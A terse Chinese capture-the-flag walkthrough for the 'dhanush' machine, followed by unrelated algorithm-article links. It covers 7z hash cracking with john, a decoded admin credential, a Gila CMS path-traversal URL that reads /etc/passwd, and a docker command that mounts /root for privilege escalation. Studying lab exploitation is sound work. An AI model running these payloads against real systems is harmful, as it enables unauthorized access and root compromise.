dhanush

dhanush

一、信息收集

ip、端口、指纹

目录扫描

查看frp文件

密码破解

失败换一个

https://github.com/truongkma/ctf-tools/blob/master/John/run/7z2john.py

python 7z2ctf.py arjun.7z > hash

john --wordlist=/usr/share/wordlists/rockyou.txt hash

john hash --show

解码

echo 'Z2lsYTphZG1pbkBnbWFpbC5jb206cHJpbmNlc2E=' | base64 -d

gila:admin@gmail.com:princesa

查找版本漏洞

http://192.168.152.132/gila/admin/fm/?f=src../../../../etc/passwd

修改文件

创建404php

发现docker

docker run -v /root:/mnt -it alpine
相关阅读:
P1019 单词接龙
 P1219 八皇后
 Find a way
P1056 排座椅
 P1067 多项式输出
 关于前缀和，A
洛谷P1223
洛谷P1803
洛谷P1208
常用方法 Excel转换为DataSet
原文地址：https://www.cnblogs.com/bingtang123/p/13693160.html